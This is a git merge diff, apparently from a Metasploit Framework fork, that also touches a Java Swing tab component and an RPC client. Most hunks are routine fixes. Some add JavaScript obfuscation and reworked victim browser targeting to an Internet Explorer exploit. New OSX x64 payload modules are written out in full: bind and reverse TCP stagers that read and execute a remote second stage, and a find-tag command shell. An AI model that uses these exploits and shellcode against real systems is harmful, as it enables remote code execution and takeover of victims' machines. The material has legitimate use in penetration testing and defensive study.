Merge branch 'upstream-master'
commit
f54656f7b5
Binary file not shown.
|
@ -13,6 +13,7 @@ import java.awt.event.FocusListener;
|
||||||
import java.awt.event.MouseAdapter;
|
import java.awt.event.MouseAdapter;
|
||||||
import java.awt.event.MouseEvent;
|
import java.awt.event.MouseEvent;
|
||||||
import java.awt.event.MouseMotionAdapter;
|
import java.awt.event.MouseMotionAdapter;
|
||||||
|
import java.awt.event.MouseMotionListener;
|
||||||
import java.awt.event.WindowEvent;
|
import java.awt.event.WindowEvent;
|
||||||
import java.awt.event.WindowFocusListener;
|
import java.awt.event.WindowFocusListener;
|
||||||
import java.util.ArrayList;
|
import java.util.ArrayList;
|
||||||
|
@ -49,7 +50,16 @@ public class DraggableTabbedPane extends JTabbedPane{
|
||||||
static{
|
static{
|
||||||
//Set up placeholder window. (Shows when moving tabs)
|
//Set up placeholder window. (Shows when moving tabs)
|
||||||
window = new JWindow();
|
window = new JWindow();
|
||||||
window.getContentPane().add(new JLabel("Moving", JLabel.CENTER), java.awt.BorderLayout.CENTER);
|
JLabel lab = new JLabel("Moving", JLabel.CENTER);
|
||||||
|
lab.addMouseMotionListener(new MouseMotionListener() {
|
||||||
|
public void mouseMoved(MouseEvent e) {
|
||||||
|
window.setVisible(false);
|
||||||
|
}
|
||||||
|
public void mouseDragged(MouseEvent e) {
|
||||||
|
window.setVisible(false);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
window.getContentPane().add(lab, java.awt.BorderLayout.CENTER);
|
||||||
window.setSize(300, 300);
|
window.setSize(300, 300);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -333,7 +343,7 @@ public class DraggableTabbedPane extends JTabbedPane{
|
||||||
//Set up dragging listener
|
//Set up dragging listener
|
||||||
addMouseMotionListener(new MouseMotionAdapter() {
|
addMouseMotionListener(new MouseMotionAdapter() {
|
||||||
public void mouseDragged(MouseEvent e) {
|
public void mouseDragged(MouseEvent e) {
|
||||||
if (!dragging) {
|
if (!dragging && ((e.getModifiersEx() & MouseEvent.BUTTON1_DOWN_MASK) != 0)) {
|
||||||
// Gets the tab index based on the mouse position
|
// Gets the tab index based on the mouse position
|
||||||
int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
|
int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
|
||||||
if (tabNumber < 0)
|
if (tabNumber < 0)
|
||||||
|
|
|
@ -114,7 +114,8 @@ public abstract class RpcConnection {
|
||||||
* @throws IOException
|
* @throws IOException
|
||||||
*/
|
*/
|
||||||
protected void disconnect() throws SocketException, IOException{
|
protected void disconnect() throws SocketException, IOException{
|
||||||
connection.close();
|
if(connection != null)
|
||||||
|
connection.close();
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
|
@ -6,7 +6,6 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'json'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def run
|
def run
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
|
@ -63,6 +61,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
begin
|
||||||
|
require 'json'
|
||||||
|
rescue LoadError
|
||||||
|
print_error("Json is not available on your machine")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
begin
|
begin
|
||||||
j = JSON.parse(res.body)
|
j = JSON.parse(res.body)
|
||||||
|
|
||||||
|
@ -78,7 +83,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
rescue JSON::ParserError
|
rescue JSON::ParserError
|
||||||
print_error("Unable to parse JSON")
|
print_error("Unable to parse JSON")
|
||||||
print_line(res.body)
|
print_line(res.body)
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -25,10 +25,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'HTTP Form Field Fuzzer',
|
'Name' => 'HTTP Form Field Fuzzer',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module will grab all fields from a form,
|
This module will grab all fields from a form,
|
||||||
and launch a series of POST actions, fuzzing the contents
|
and launch a series of POST actions, fuzzing the contents
|
||||||
of the form fields. You can optionally fuzz headers too
|
of the form fields. You can optionally fuzz headers too
|
||||||
(option is enabled by default)
|
(option is enabled by default)
|
||||||
},
|
},
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'corelanc0d3r',
|
'corelanc0d3r',
|
||||||
|
@ -69,28 +69,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
proto = "https://"
|
proto = "https://"
|
||||||
end
|
end
|
||||||
|
|
||||||
useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
|
|
||||||
if datastore['UserAgent'] != nil
|
|
||||||
if datastore['UserAgent'].length > 0
|
|
||||||
useragent = datastore['UserAgent']
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
host = datastore['RHOST']
|
|
||||||
if datastore['VHOST']
|
|
||||||
if datastore['VHOST'].length > 0
|
|
||||||
host = datastore['VHOST']
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
@send_data = {
|
@send_data = {
|
||||||
:uri => '',
|
:uri => '',
|
||||||
:version => '1.1',
|
:version => '1.1',
|
||||||
:method => 'POST',
|
:method => 'POST',
|
||||||
:headers => {
|
:headers => {
|
||||||
'Content-Length' => 100,
|
'Content-Length' => 100,
|
||||||
'Host' => host,
|
|
||||||
'User-Agent' => useragent,
|
|
||||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||||
'Accept-Language' => 'en-us,en;q=0.5',
|
'Accept-Language' => 'en-us,en;q=0.5',
|
||||||
'Accept-Encoding' => 'gzip,deflate',
|
'Accept-Encoding' => 'gzip,deflate',
|
||||||
|
@ -98,12 +82,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Keep-Alive' => '300',
|
'Keep-Alive' => '300',
|
||||||
'Connection' => 'keep-alive',
|
'Connection' => 'keep-alive',
|
||||||
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
|
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
|
||||||
'Content-Type' => 'application/x-www-form-urlencoded',
|
'Content-Type' => 'application/x-www-form-urlencoded'
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@get_data_headers = {
|
@get_data_headers = {
|
||||||
'Host' => host,
|
|
||||||
'User-Agent' => useragent,
|
|
||||||
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
|
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
@ -272,6 +254,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
datastr=datastr[0,datastr.length-1]
|
datastr=datastr[0,datastr.length-1]
|
||||||
@send_data[:uri] = form[:action]
|
@send_data[:uri] = form[:action]
|
||||||
|
@send_data[:uri] = "/#{form[:action]}" if @send_data[:uri][0,1] != '/'
|
||||||
|
|
||||||
@send_data[:method] = form[:method].upcase
|
@send_data[:method] = form[:method].upcase
|
||||||
response = send_fuzz(@send_data,datastr)
|
response = send_fuzz(@send_data,datastr)
|
||||||
if not process_response(response,field,"field")
|
if not process_response(response,field,"field")
|
||||||
|
@ -322,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_field_val(input)
|
def get_field_val(input)
|
||||||
tmp = input.split(/=/)
|
tmp = input.split(/\=/)
|
||||||
#get delimeter
|
#get delimeter
|
||||||
tmp2 = tmp[1].strip
|
tmp2 = tmp[1].strip
|
||||||
delim = tmp2[0,1]
|
delim = tmp2[0,1]
|
||||||
|
@ -435,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
location = fielddata[0].index(thisfield)
|
location = fielddata[0].index(thisfield)
|
||||||
delta = fielddata[0].size - location
|
delta = fielddata[0].size - location
|
||||||
remaining = fielddata[0][location,delta]
|
remaining = fielddata[0][location,delta]
|
||||||
tmp = remaining.strip.split(/=/)
|
tmp = remaining.strip.split(/\=/)
|
||||||
if tmp.size > 1
|
if tmp.size > 1
|
||||||
delim = tmp[1][0,1]
|
delim = tmp[1][0,1]
|
||||||
tmp2 = tmp[1].split(delim)
|
tmp2 = tmp[1].split(delim)
|
||||||
|
|
|
@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
['OSVDB', '85654'],
|
||||||
['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
|
['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
|
|
|
@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
['OSVDB', '85554'],
|
||||||
['EDB', '21329']
|
['EDB', '21329']
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'unknown', # Some secret ninja
|
'unknown', # via ZDI
|
||||||
'eromang', # First public discovery
|
'eromang', # First public discovery
|
||||||
'binjo',
|
'binjo',
|
||||||
'sinn3r', # Metasploit
|
'sinn3r', # Metasploit
|
||||||
|
@ -78,27 +78,40 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
|
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||||
|
], self.class)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_target(agent)
|
def get_target(agent)
|
||||||
#If the user is already specified by the user, we'll just use that
|
#If the user is already specified by the user, we'll just use that
|
||||||
return target if target.name != 'Automatic'
|
return target if target.name != 'Automatic'
|
||||||
|
|
||||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||||
return targets[1] #IE 7 on Windows XP SP3
|
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
|
||||||
return targets[2] #IE 8 on Windows XP SP3
|
ie_name = "IE #{ie}"
|
||||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
|
||||||
return targets[3] #IE 7 on Windows Vista
|
case nt
|
||||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
|
when '5.1'
|
||||||
return targets[4] #IE 8 on Windows Vista
|
os_name = 'Windows XP SP3'
|
||||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
|
when '6.0'
|
||||||
return targets[5] #IE 8 on Windows 7
|
os_name = 'Windows Vista'
|
||||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
|
when '6.1'
|
||||||
return targets[6] #IE 9 on Windows 7
|
os_name = 'Windows 7'
|
||||||
else
|
|
||||||
return nil
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
targets.each do |t|
|
||||||
|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||||
|
vprint_status("Target selected as: #{t.name}")
|
||||||
|
return t
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
def junk(n=4)
|
def junk(n=4)
|
||||||
|
@ -283,8 +296,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
js = heaplib(js, {:noobfu => true})
|
js = heaplib(js, {:noobfu => true})
|
||||||
|
if datastore['OBFUSCATE']
|
||||||
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||||
|
js.obfuscate
|
||||||
|
end
|
||||||
|
|
||||||
html = <<-EOS
|
html = %Q|
|
||||||
<html>
|
<html>
|
||||||
<body>
|
<body>
|
||||||
<script>
|
<script>
|
||||||
|
@ -299,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
</script>
|
</script>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
EOS
|
|
|
||||||
|
|
||||||
return html
|
return html
|
||||||
end
|
end
|
||||||
|
@ -335,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
print_status request.headers['User-Agent']
|
uri = request.uri
|
||||||
agent = request.headers['User-Agent']
|
agent = request.headers['User-Agent']
|
||||||
my_target = get_target(agent)
|
my_target = get_target(agent)
|
||||||
|
|
||||||
|
vprint_status("Requesting: #{uri}")
|
||||||
|
print_status(agent)
|
||||||
|
|
||||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||||
if my_target.nil?
|
if my_target.nil?
|
||||||
print_error("Browser not supported, sending a 404: #{agent.to_s}")
|
print_error("Browser not supported, sending a 404: #{agent.to_s}")
|
||||||
|
@ -346,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
vprint_status("Requesting: #{request.uri}")
|
if uri =~ /#{@html2_name}/
|
||||||
|
|
||||||
if request.uri =~ /#{@html2_name}/
|
|
||||||
print_status("Loading #{@html2_name}")
|
print_status("Loading #{@html2_name}")
|
||||||
html = load_html2
|
html = load_html2
|
||||||
elsif request.uri =~ /#{@html1_name}/
|
elsif uri =~ /#{@html1_name}/
|
||||||
print_status("Loading #{@html1_name}")
|
print_status("Loading #{@html1_name}")
|
||||||
html = load_html1(cli, my_target)
|
html = load_html1(cli, my_target)
|
||||||
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
|
elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
|
||||||
print_status("Redirecting to #{@html1_name}")
|
print_status("Redirecting to #{@html1_name}")
|
||||||
send_redirect(cli, "#{this_resource}/#{@html1_name}")
|
send_redirect(cli, "#{this_resource}/#{@html1_name}")
|
||||||
return
|
return
|
||||||
|
|
|
@ -0,0 +1,53 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'OSX X64 say Shellcode',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Say an arbitrary string outloud using Mac OS X text2speech',
|
||||||
|
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_X86_64
|
||||||
|
))
|
||||||
|
|
||||||
|
# exec payload options
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TEXT', [ true, "The text to say", "Hello\!"]),
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
# build the shellcode payload dynamically based on the user-provided CMD
|
||||||
|
def generate
|
||||||
|
say = (datastore['TEXT'] || '') << "\x00"
|
||||||
|
call = "\xe8" + [say.length + 0xd].pack('V')
|
||||||
|
|
||||||
|
payload =
|
||||||
|
"\x48\x31\xC0" + # xor rax,rax
|
||||||
|
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||||
|
call +
|
||||||
|
"/usr/bin/say\x00" +
|
||||||
|
say +
|
||||||
|
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||||
|
"\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
|
||||||
|
"\x48\x31\xD2" + # xor rdx,rdx
|
||||||
|
"\x52" + # push rdx
|
||||||
|
"\x41\x52" + # push r10
|
||||||
|
"\x57" + # push rdi
|
||||||
|
"\x48\x89\xE6" + # mov rsi,rsp
|
||||||
|
"\x0F\x05" # loadall286
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,84 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/find_tag'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
include Msf::Payload::Osx
|
||||||
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'OSX Command Shell, Find Tag Inline',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Spawn a shell on an established connection (proxy/nat safe)',
|
||||||
|
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_X86_64,
|
||||||
|
'Handler' => Msf::Handler::FindTag,
|
||||||
|
'Session' => Msf::Sessions::CommandShellUnix
|
||||||
|
|
||||||
|
))
|
||||||
|
# exec payload options
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]),
|
||||||
|
OptString.new('TAG', [ true, "The tag to test for", "NEMO" ]),
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# ensures the setting of tag to a four byte value
|
||||||
|
#
|
||||||
|
def generate
|
||||||
|
cmd = (datastore['CMD'] || '') << "\x00"
|
||||||
|
call = "\xe8" + [cmd.length].pack('V')
|
||||||
|
|
||||||
|
payload =
|
||||||
|
"\x48\x31\xFF" + # xor rdi,rdi
|
||||||
|
"\x57" + # push rdi
|
||||||
|
"\x48\x89\xE6" + # mov rsi,rsp
|
||||||
|
"\x6A\x04" + # push byte +0x4
|
||||||
|
"\x5A" + # pop rdx
|
||||||
|
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
|
||||||
|
"\x4D\x31\xC0" + # xor r8,r8
|
||||||
|
"\x4D\x31\xC9" + # xor r9,r9
|
||||||
|
"\x48\xFF\xCF" + # dec rdi
|
||||||
|
"\x48\xFF\xC7" + # inc rdi
|
||||||
|
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
|
||||||
|
datastore['TAG'] +
|
||||||
|
"\x75\xED" + # jnz 0x17
|
||||||
|
"\x48\x31\xC9" + # xor rcx,rcx
|
||||||
|
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||||
|
"\x48\x31\xF6" + # xor rsi,rsi
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||||
|
"\x48\xFF\xC6" + # inc rsi
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\x48\x31\xC0" + # xor rax,rax
|
||||||
|
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||||
|
call +
|
||||||
|
cmd +
|
||||||
|
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||||
|
"\x48\x31\xD2" + # xor rdx,rdx
|
||||||
|
"\x52" + # push rdx
|
||||||
|
"\x57" + # push rdi
|
||||||
|
"\x48\x89\xE6" + # mov rsi,rsp
|
||||||
|
"\x0F\x05" # loadall286
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -0,0 +1,101 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/bind_tcp'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Stager
|
||||||
|
|
||||||
|
def initialize(info = { })
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Bind TCP Stager',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Listen, read length, read buffer, execute',
|
||||||
|
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_X86_64,
|
||||||
|
'Handler' => Msf::Handler::BindTcp,
|
||||||
|
'Convention' => 'sockedi',
|
||||||
|
'Stager' =>
|
||||||
|
{
|
||||||
|
'Offsets' => { 'LPORT' => [ 31, 'n'] },
|
||||||
|
'Payload' =>
|
||||||
|
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
|
||||||
|
"\x6A\x02" + # push byte +0x2
|
||||||
|
"\x5F" + # pop rdi
|
||||||
|
"\x6A\x01" + # push byte +0x1
|
||||||
|
"\x5E" + # pop rsi
|
||||||
|
"\x48\x31\xD2" + # xor rdx,rdx
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\x48\x89\xC7" + # mov rdi,rax
|
||||||
|
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
|
||||||
|
"\x48\x31\xF6" + # xor rsi,rsi
|
||||||
|
"\x56" + # push rsi
|
||||||
|
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
|
||||||
|
"\x56" + # push rsi
|
||||||
|
"\x48\x89\xE6" + # mov rsi,rsp
|
||||||
|
"\x6A\x10" + # push byte +0x10
|
||||||
|
"\x5A" + # pop rdx
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
|
||||||
|
"\x48\x31\xF6" + # xor rsi,rsi
|
||||||
|
"\x48\xFF\xC6" + # inc rsi
|
||||||
|
"\x49\x89\xFC" + # mov r12,rdi
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
|
||||||
|
"\x4C\x89\xE7" + # mov rdi,r12
|
||||||
|
"\x48\x89\xE6" + # mov rsi,rsp
|
||||||
|
"\x48\x89\xE2" + # mov rdx,rsp
|
||||||
|
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\x49\x89\xC5" + # mov r13,rax
|
||||||
|
"\x48\x89\xC7" + # mov rdi,rax
|
||||||
|
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||||
|
"\x48\x31\xC9" + # xor rcx,rcx
|
||||||
|
"\x51" + # push rcx
|
||||||
|
"\x48\x89\xE6" + # mov rsi,rsp
|
||||||
|
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
|
||||||
|
"\x4D\x31\xC0" + # xor r8,r8
|
||||||
|
"\x4D\x31\xD2" + # xor r10,r10
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\x41\x5B" + # pop r11
|
||||||
|
"\x4C\x89\xDE" + # mov rsi,r11
|
||||||
|
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
|
||||||
|
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
|
||||||
|
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
|
||||||
|
"\x48\x31\xFF" + # xor rdi,rdi
|
||||||
|
"\x48\xFF\xCF" + # dec rdi
|
||||||
|
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
|
||||||
|
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
|
||||||
|
"\x49\x89\xF8" + # mov r8,rdi
|
||||||
|
"\x4D\x31\xC9" + # xor r9,r9
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\x48\x89\xC6" + # mov rsi,rax
|
||||||
|
"\x56" + # push rsi
|
||||||
|
"\x4C\x89\xEF" + # mov rdi,r13
|
||||||
|
"\x48\x31\xC9" + # xor rcx,rcx
|
||||||
|
"\x4C\x89\xDA" + # mov rdx,r11
|
||||||
|
"\x4D\x31\xC0" + # xor r8,r8
|
||||||
|
"\x4D\x31\xD2" + # xor r10,r10
|
||||||
|
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||||
|
"\x0F\x05" + # loadall286
|
||||||
|
"\x58" + # pop rax
|
||||||
|
"\xFF\xD0" # call rax
|
||||||
|
}
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
def handle_intermediate_stage(conn, p)
|
||||||
|
#
|
||||||
|
# Our stager payload expects to see a next-stage length first.
|
||||||
|
#
|
||||||
|
conn.put([p.length].pack('V'))
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,57 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/reverse_tcp'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Stager
|
||||||
|
|
||||||
|
def initialize(info = { })
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Reverse TCP Stager',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Connect, read length, read buffer, execute',
|
||||||
|
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_X86_64,
|
||||||
|
'Handler' => Msf::Handler::ReverseTcp,
|
||||||
|
'Convention' => 'sockedi',
|
||||||
|
'Stager' =>
|
||||||
|
{
|
||||||
|
'Offsets' =>
|
||||||
|
{
|
||||||
|
'LHOST' => [ 37, 'ADDR'],
|
||||||
|
'LPORT' => [ 35, 'n']
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
|
||||||
|
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
|
||||||
|
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
|
||||||
|
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
|
||||||
|
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
|
||||||
|
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
|
||||||
|
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
|
||||||
|
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
|
||||||
|
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
|
||||||
|
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
|
||||||
|
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
|
||||||
|
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
|
||||||
|
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
|
||||||
|
}
|
||||||
|
))
|
||||||
|
end
|
||||||
